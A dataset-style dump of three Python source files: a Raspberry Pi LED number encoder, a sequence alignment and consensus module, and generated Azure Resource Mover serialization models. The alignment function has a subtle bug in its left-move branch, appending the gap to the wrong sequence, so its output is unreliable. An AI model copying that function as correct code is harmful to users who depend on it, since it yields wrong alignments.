code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
"""Library of functions for encoding a number in LEDs."""
import RPi.GPIO as GPIO
def light(pin):
GPIO.output(pin, GPIO.HIGH)
def clear(pinlist):
for p in pinlist:
GPIO.output(p, GPIO.LOW)
def encode(n, pinlist):
clear(pinlist)
for i, p in enumerate(pinlist):
if (n >> i) % 2:
light(p)
| zimolzak/Raspberry-Pi-newbie | fourleds.py | Python | mit | 338 |
# -*- coding: utf-8 -*-
def get_alignments(iseq, jseq, backtracking, end_cell):
iseq_r = []
jseq_r = []
current_cell_v = backtracking[end_cell[0]][end_cell[1]]
current_cell_index = end_cell
while current_cell_v != "s":
if current_cell_v == "u":
jseq_r.append("-")
iseq_r.append(iseq[current_cell_index[0] - 1])
current_cell_index = (current_cell_index[0] - 1, current_cell_index[1])
elif current_cell_v == "l":
jseq_r.append("-")
jseq_r.append(jseq[current_cell_index[1] - 1])
current_cell_index = (current_cell_index[0], current_cell_index[1] - 1)
else:
iseq_r.append(iseq[current_cell_index[0] - 1])
jseq_r.append(jseq[current_cell_index[1] - 1])
current_cell_index = (current_cell_index[0] - 1, current_cell_index[1] - 1)
current_cell_v = backtracking[current_cell_index[0]][current_cell_index[1]]
return "".join(reversed(iseq_r)), "".join(reversed(jseq_r))
def get_consensus_sequences(aligned_seqs):
result = []
for fl, sl in zip(*aligned_seqs):
if fl == "-":
candidate = sl
elif sl == "-":
candidate = fl
elif fl == "N":
candidate = sl
elif sl == "N":
candidate = fl
elif sl == fl:
candidate = sl
else:
candidate = "N"
result.append(candidate)
return "".join(result)
def substitute_score(letter1, letter2):
if letter1 == "N" or letter2 == "N" or letter1 == letter2:
return 0
return 1
def bounded_alignment(seq1, seq2, max_edit_distance=-1):
if max_edit_distance == -1:
max_edit_distance = max(len(seq1), len(seq2))
i_range = len(seq1) + 1
j_range = len(seq2) + 1
M = [[0] * j_range for _ in range(i_range)]
Mbt = [["s" for _ in range(j_range)] for _ in range(i_range)]
for j in range(1, j_range):
M[0][j] = j
Mbt[0][j] = "l"
for i in range(1, i_range):
M[i][0] = i
Mbt[i][0] = "u"
for i in range(1, i_range):
for j in range(1, j_range):
if abs(i - j) > max_edit_distance:
continue
options = [(M[i - 1][j - 1] + substitute_score(seq1[i - 1], seq2[j - 1]), "d")]
if abs(i - j) < max_edit_distance:
options.append((M[i - 1][j] + 1, "u"))
options.append((M[i][j - 1] + 1, "l"))
else:
if i > j:
options.append((M[i - 1][j] + 1, "u"))
else:
options.append((M[i][j - 1] + 1, "l"))
result = min(options, key=lambda entry: entry[0])
M[i][j] = result[0]
Mbt[i][j] = result[1]
if M[-1][-1] > max_edit_distance:
return AlignmentResult(seq1=seq1, seq2=seq2, consensus=None, al_seq1=None, al_seq2=None, edit_distance=M[-1][-1])
aligned_seqs = get_alignments(iseq=seq1, jseq=seq2, backtracking=Mbt, end_cell=(i_range - 1, j_range - 1))
consensus_seq = get_consensus_sequences(aligned_seqs=aligned_seqs)
return AlignmentResult(seq1=seq1, seq2=seq2, consensus=consensus_seq, al_seq1=aligned_seqs[0], al_seq2=aligned_seqs[1], edit_distance=M[-1][-1])
class AlignmentResult(object):
def __init__(self, seq1, seq2, consensus, al_seq1, al_seq2, edit_distance):
self.seq1 = seq1
self.seq2 = seq2
self.al_seq1 = al_seq1
self.al_seq2 = al_seq2
self.consensus = consensus
self.edit_distance = edit_distance
| compbiol/CAMSA | camsa/utils/fasta/algo.py | Python | mit | 3,576 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Dict, List, Optional, Union
import msrest.serialization
from ._resource_mover_service_api_enums import *
class AffectedMoveResource(msrest.serialization.Model):
"""The RP custom operation error info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The affected move resource id.
:vartype id: str
:ivar source_id: The affected move resource source id.
:vartype source_id: str
:ivar move_resources: The affected move resources.
:vartype move_resources: list[~resource_mover_service_api.models.AffectedMoveResource]
"""
_validation = {
'id': {'readonly': True},
'source_id': {'readonly': True},
'move_resources': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'source_id': {'key': 'sourceId', 'type': 'str'},
'move_resources': {'key': 'moveResources', 'type': '[AffectedMoveResource]'},
}
def __init__(
self,
**kwargs
):
super(AffectedMoveResource, self).__init__(**kwargs)
self.id = None
self.source_id = None
self.move_resources = None
class AutomaticResolutionProperties(msrest.serialization.Model):
"""Defines the properties for automatic resolution.
:param move_resource_id: Gets the MoveResource ARM ID of
the dependent resource if the resolution type is Automatic.
:type move_resource_id: str
"""
_attribute_map = {
'move_resource_id': {'key': 'moveResourceId', 'type': 'str'},
}
def __init__(
self,
*,
move_resource_id: Optional[str] = None,
**kwargs
):
super(AutomaticResolutionProperties, self).__init__(**kwargs)
self.move_resource_id = move_resource_id
class ResourceSettings(msrest.serialization.Model):
"""Gets or sets the resource settings.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AvailabilitySetResourceSettings, DiskEncryptionSetResourceSettings, VirtualMachineResourceSettings, KeyVaultResourceSettings, LoadBalancerResourceSettings, NetworkInterfaceResourceSettings, NetworkSecurityGroupResourceSettings, PublicIPAddressResourceSettings, VirtualNetworkResourceSettings, SqlServerResourceSettings, SqlDatabaseResourceSettings, SqlElasticPoolResourceSettings, ResourceGroupResourceSettings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
_subtype_map = {
'resource_type': {'Microsoft.Compute/availabilitySets': 'AvailabilitySetResourceSettings', 'Microsoft.Compute/diskEncryptionSets': 'DiskEncryptionSetResourceSettings', 'Microsoft.Compute/virtualMachines': 'VirtualMachineResourceSettings', 'Microsoft.KeyVault/vaults': 'KeyVaultResourceSettings', 'Microsoft.Network/loadBalancers': 'LoadBalancerResourceSettings', 'Microsoft.Network/networkInterfaces': 'NetworkInterfaceResourceSettings', 'Microsoft.Network/networkSecurityGroups': 'NetworkSecurityGroupResourceSettings', 'Microsoft.Network/publicIPAddresses': 'PublicIPAddressResourceSettings', 'Microsoft.Network/virtualNetworks': 'VirtualNetworkResourceSettings', 'Microsoft.Sql/servers': 'SqlServerResourceSettings', 'Microsoft.Sql/servers/databases': 'SqlDatabaseResourceSettings', 'Microsoft.Sql/servers/elasticPools': 'SqlElasticPoolResourceSettings', 'resourceGroups': 'ResourceGroupResourceSettings'}
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(ResourceSettings, self).__init__(**kwargs)
self.resource_type = None # type: Optional[str]
self.target_resource_name = target_resource_name
class AvailabilitySetResourceSettings(ResourceSettings):
"""Gets or sets the availability set resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param fault_domain: Gets or sets the target fault domain.
:type fault_domain: int
:param update_domain: Gets or sets the target update domain.
:type update_domain: int
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
'fault_domain': {'minimum': 1},
'update_domain': {'maximum': 20, 'minimum': 1},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'fault_domain': {'key': 'faultDomain', 'type': 'int'},
'update_domain': {'key': 'updateDomain', 'type': 'int'},
}
def __init__(
self,
*,
target_resource_name: str,
fault_domain: Optional[int] = None,
update_domain: Optional[int] = None,
**kwargs
):
super(AvailabilitySetResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Compute/availabilitySets' # type: str
self.fault_domain = fault_domain
self.update_domain = update_domain
class AzureResourceReference(msrest.serialization.Model):
"""Defines reference to an Azure resource.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
**kwargs
):
super(AzureResourceReference, self).__init__(**kwargs)
self.source_arm_resource_id = source_arm_resource_id
class BulkRemoveRequest(msrest.serialization.Model):
"""Defines the request body for bulk remove of move resources operation.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Gets or sets the list of resource Id's, by default it accepts move
resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
validate_only: Optional[bool] = None,
move_resources: Optional[List[str]] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(BulkRemoveRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class CloudErrorBody(msrest.serialization.Model):
"""An error response from the service.
:param code: An identifier for the error. Codes are invariant and are intended to be consumed
programmatically.
:type code: str
:param message: A message describing the error, intended to be suitable for display in a user
interface.
:type message: str
:param target: The target of the particular error. For example, the name of the property in
error.
:type target: str
:param details: A list of additional details about the error.
:type details: list[~resource_mover_service_api.models.CloudErrorBody]
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[CloudErrorBody]'},
}
def __init__(
self,
*,
code: Optional[str] = None,
message: Optional[str] = None,
target: Optional[str] = None,
details: Optional[List["CloudErrorBody"]] = None,
**kwargs
):
super(CloudErrorBody, self).__init__(**kwargs)
self.code = code
self.message = message
self.target = target
self.details = details
class CommitRequest(msrest.serialization.Model):
"""Defines the request body for commit operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(CommitRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class DiscardRequest(msrest.serialization.Model):
"""Defines the request body for discard operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(DiscardRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
class DiskEncryptionSetResourceSettings(ResourceSettings):
"""Defines the disk encryption set resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(DiskEncryptionSetResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Compute/diskEncryptionSets' # type: str
class Display(msrest.serialization.Model):
"""Contains the localized display information for this particular operation / action. These
value will be used by several clients for
(1) custom role definitions for RBAC;
(2) complex query filters for the event service; and
(3) audit history / records for management operations.
:param provider: Gets or sets the provider.
The localized friendly form of the resource provider name – it is expected to also
include the publisher/company responsible.
It should use Title Casing and begin with "Microsoft" for 1st party services.
e.g. "Microsoft Monitoring Insights" or "Microsoft Compute.".
:type provider: str
:param resource: Gets or sets the resource.
The localized friendly form of the resource related to this action/operation – it
should match the public documentation for the resource provider.
It should use Title Casing.
This value should be unique for a particular URL type (e.g. nested types should *not*
reuse their parent’s display.resource field)
e.g. "Virtual Machines" or "Scheduler Job Collections", or "Virtual Machine VM Sizes"
or "Scheduler Jobs".
:type resource: str
:param operation: Gets or sets the operation.
The localized friendly name for the operation, as it should be shown to the user.
It should be concise (to fit in drop downs) but clear (i.e. self-documenting).
It should use Title Casing.
Prescriptive guidance: Read Create or Update Delete 'ActionName'.
:type operation: str
:param description: Gets or sets the description.
The localized friendly description for the operation, as it should be shown to the
user.
It should be thorough, yet concise – it will be used in tool tips and detailed views.
Prescriptive guidance for namespace:
Read any 'display.provider' resource
Create or Update any 'display.provider' resource
Delete any 'display.provider' resource
Perform any other action on any 'display.provider' resource
Prescriptive guidance for namespace:
Read any 'display.resource' Create or Update any 'display.resource' Delete any
'display.resource' 'ActionName' any 'display.resources'.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(Display, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class Identity(msrest.serialization.Model):
"""Defines the MSI properties of the Move Collection.
:param type: The type of identity used for the resource mover service. Possible values include:
"None", "SystemAssigned", "UserAssigned".
:type type: str or ~resource_mover_service_api.models.ResourceIdentityType
:param principal_id: Gets or sets the principal id.
:type principal_id: str
:param tenant_id: Gets or sets the tenant id.
:type tenant_id: str
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
}
def __init__(
self,
*,
type: Optional[Union[str, "ResourceIdentityType"]] = None,
principal_id: Optional[str] = None,
tenant_id: Optional[str] = None,
**kwargs
):
super(Identity, self).__init__(**kwargs)
self.type = type
self.principal_id = principal_id
self.tenant_id = tenant_id
class JobStatus(msrest.serialization.Model):
"""Defines the job status.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar job_name: Defines the job name. Possible values include: "InitialSync".
:vartype job_name: str or ~resource_mover_service_api.models.JobName
:ivar job_progress: Gets or sets the monitoring job percentage.
:vartype job_progress: str
"""
_validation = {
'job_name': {'readonly': True},
'job_progress': {'readonly': True},
}
_attribute_map = {
'job_name': {'key': 'jobName', 'type': 'str'},
'job_progress': {'key': 'jobProgress', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobStatus, self).__init__(**kwargs)
self.job_name = None
self.job_progress = None
class KeyVaultResourceSettings(ResourceSettings):
"""Defines the key vault resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(KeyVaultResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.KeyVault/vaults' # type: str
class LBBackendAddressPoolResourceSettings(msrest.serialization.Model):
"""Defines load balancer backend address pool properties.
:param name: Gets or sets the backend address pool name.
:type name: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
**kwargs
):
super(LBBackendAddressPoolResourceSettings, self).__init__(**kwargs)
self.name = name
class LBFrontendIPConfigurationResourceSettings(msrest.serialization.Model):
"""Defines load balancer frontend IP configuration properties.
:param name: Gets or sets the frontend IP configuration name.
:type name: str
:param private_ip_address: Gets or sets the IP address of the Load Balancer.This is only
specified if a specific
private IP address shall be allocated from the subnet specified in subnetRef.
:type private_ip_address: str
:param private_ip_allocation_method: Gets or sets PrivateIP allocation method (Static/Dynamic).
:type private_ip_allocation_method: str
:param subnet: Defines reference to subnet.
:type subnet: ~resource_mover_service_api.models.SubnetReference
:param zones: Gets or sets the csv list of zones.
:type zones: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'privateIpAllocationMethod', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'SubnetReference'},
'zones': {'key': 'zones', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
private_ip_address: Optional[str] = None,
private_ip_allocation_method: Optional[str] = None,
subnet: Optional["SubnetReference"] = None,
zones: Optional[str] = None,
**kwargs
):
super(LBFrontendIPConfigurationResourceSettings, self).__init__(**kwargs)
self.name = name
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.zones = zones
class ProxyResourceReference(AzureResourceReference):
"""Defines reference to a proxy resource.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(ProxyResourceReference, self).__init__(source_arm_resource_id=source_arm_resource_id, **kwargs)
self.name = name
class LoadBalancerBackendAddressPoolReference(ProxyResourceReference):
"""Defines reference to load balancer backend address pools.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(LoadBalancerBackendAddressPoolReference, self).__init__(source_arm_resource_id=source_arm_resource_id, name=name, **kwargs)
class LoadBalancerNatRuleReference(ProxyResourceReference):
"""Defines reference to load balancer NAT rules.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(LoadBalancerNatRuleReference, self).__init__(source_arm_resource_id=source_arm_resource_id, name=name, **kwargs)
class LoadBalancerResourceSettings(ResourceSettings):
"""Defines the load balancer resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param sku: Gets or sets load balancer sku (Basic/Standard).
:type sku: str
:param frontend_ip_configurations: Gets or sets the frontend IP configurations of the load
balancer.
:type frontend_ip_configurations:
list[~resource_mover_service_api.models.LBFrontendIPConfigurationResourceSettings]
:param backend_address_pools: Gets or sets the backend address pools of the load balancer.
:type backend_address_pools:
list[~resource_mover_service_api.models.LBBackendAddressPoolResourceSettings]
:param zones: Gets or sets the csv list of zones common for all frontend IP configurations.
Note this is given
precedence only if frontend IP configurations settings are not present.
:type zones: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'str'},
'frontend_ip_configurations': {'key': 'frontendIPConfigurations', 'type': '[LBFrontendIPConfigurationResourceSettings]'},
'backend_address_pools': {'key': 'backendAddressPools', 'type': '[LBBackendAddressPoolResourceSettings]'},
'zones': {'key': 'zones', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
sku: Optional[str] = None,
frontend_ip_configurations: Optional[List["LBFrontendIPConfigurationResourceSettings"]] = None,
backend_address_pools: Optional[List["LBBackendAddressPoolResourceSettings"]] = None,
zones: Optional[str] = None,
**kwargs
):
super(LoadBalancerResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/loadBalancers' # type: str
self.sku = sku
self.frontend_ip_configurations = frontend_ip_configurations
self.backend_address_pools = backend_address_pools
self.zones = zones
class ManualResolutionProperties(msrest.serialization.Model):
"""Defines the properties for manual resolution.
:param target_id: Gets or sets the target resource ARM ID of the dependent resource if the
resource type is Manual.
:type target_id: str
"""
_attribute_map = {
'target_id': {'key': 'targetId', 'type': 'str'},
}
def __init__(
self,
*,
target_id: Optional[str] = None,
**kwargs
):
super(ManualResolutionProperties, self).__init__(**kwargs)
self.target_id = target_id
class MoveCollection(msrest.serialization.Model):
"""Define the move collection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
:ivar etag: The etag of the resource.
:vartype etag: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: The geo-location where the resource lives.
:type location: str
:param identity: Defines the MSI properties of the Move Collection.
:type identity: ~resource_mover_service_api.models.Identity
:param properties: Defines the move collection properties.
:type properties: ~resource_mover_service_api.models.MoveCollectionProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'properties': {'key': 'properties', 'type': 'MoveCollectionProperties'},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
location: Optional[str] = None,
identity: Optional["Identity"] = None,
properties: Optional["MoveCollectionProperties"] = None,
**kwargs
):
super(MoveCollection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.etag = None
self.tags = tags
self.location = location
self.identity = identity
self.properties = properties
class MoveCollectionProperties(msrest.serialization.Model):
"""Defines the move collection properties.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param source_region: Required. Gets or sets the source region.
:type source_region: str
:param target_region: Required. Gets or sets the target region.
:type target_region: str
:ivar provisioning_state: Defines the provisioning states. Possible values include:
"Succeeded", "Updating", "Creating", "Failed".
:vartype provisioning_state: str or ~resource_mover_service_api.models.ProvisioningState
:ivar errors: Defines the move collection errors.
:vartype errors: ~resource_mover_service_api.models.MoveCollectionPropertiesErrors
"""
_validation = {
'source_region': {'required': True},
'target_region': {'required': True},
'provisioning_state': {'readonly': True},
'errors': {'readonly': True},
}
_attribute_map = {
'source_region': {'key': 'sourceRegion', 'type': 'str'},
'target_region': {'key': 'targetRegion', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'errors': {'key': 'errors', 'type': 'MoveCollectionPropertiesErrors'},
}
def __init__(
self,
*,
source_region: str,
target_region: str,
**kwargs
):
super(MoveCollectionProperties, self).__init__(**kwargs)
self.source_region = source_region
self.target_region = target_region
self.provisioning_state = None
self.errors = None
class MoveResourceError(msrest.serialization.Model):
"""An error response from the azure resource mover service.
:param properties: The move resource error body.
:type properties: ~resource_mover_service_api.models.MoveResourceErrorBody
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceErrorBody'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceErrorBody"] = None,
**kwargs
):
super(MoveResourceError, self).__init__(**kwargs)
self.properties = properties
class MoveCollectionPropertiesErrors(MoveResourceError):
"""Defines the move collection errors.
:param properties: The move resource error body.
:type properties: ~resource_mover_service_api.models.MoveResourceErrorBody
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceErrorBody'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceErrorBody"] = None,
**kwargs
):
super(MoveCollectionPropertiesErrors, self).__init__(properties=properties, **kwargs)
class MoveCollectionResultList(msrest.serialization.Model):
"""Defines the collection of move collections.
:param value: Gets the list of move collections.
:type value: list[~resource_mover_service_api.models.MoveCollection]
:param next_link: Gets the value of next link.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[MoveCollection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["MoveCollection"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(MoveCollectionResultList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class MoveErrorInfo(msrest.serialization.Model):
"""The move custom error info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar move_resources: The affected move resources.
:vartype move_resources: list[~resource_mover_service_api.models.AffectedMoveResource]
"""
_validation = {
'move_resources': {'readonly': True},
}
_attribute_map = {
'move_resources': {'key': 'moveResources', 'type': '[AffectedMoveResource]'},
}
def __init__(
self,
**kwargs
):
super(MoveErrorInfo, self).__init__(**kwargs)
self.move_resources = None
class MoveResource(msrest.serialization.Model):
"""Defines the move resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
:param properties: Defines the move resource properties.
:type properties: ~resource_mover_service_api.models.MoveResourceProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'MoveResourceProperties'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceProperties"] = None,
**kwargs
):
super(MoveResource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.properties = properties
class MoveResourceCollection(msrest.serialization.Model):
"""Defines the collection of move resources.
Variables are only populated by the server, and will be ignored when sending a request.
:param value: Gets the list of move resources.
:type value: list[~resource_mover_service_api.models.MoveResource]
:param next_link: Gets the value of next link.
:type next_link: str
:param summary_collection: Gets or sets the list of summary items and the field on which
summary is done.
:type summary_collection: ~resource_mover_service_api.models.SummaryCollection
:ivar total_count: Gets the total count.
:vartype total_count: long
"""
_validation = {
'total_count': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[MoveResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
'summary_collection': {'key': 'summaryCollection', 'type': 'SummaryCollection'},
'total_count': {'key': 'totalCount', 'type': 'long'},
}
def __init__(
self,
*,
value: Optional[List["MoveResource"]] = None,
next_link: Optional[str] = None,
summary_collection: Optional["SummaryCollection"] = None,
**kwargs
):
super(MoveResourceCollection, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
self.summary_collection = summary_collection
self.total_count = None
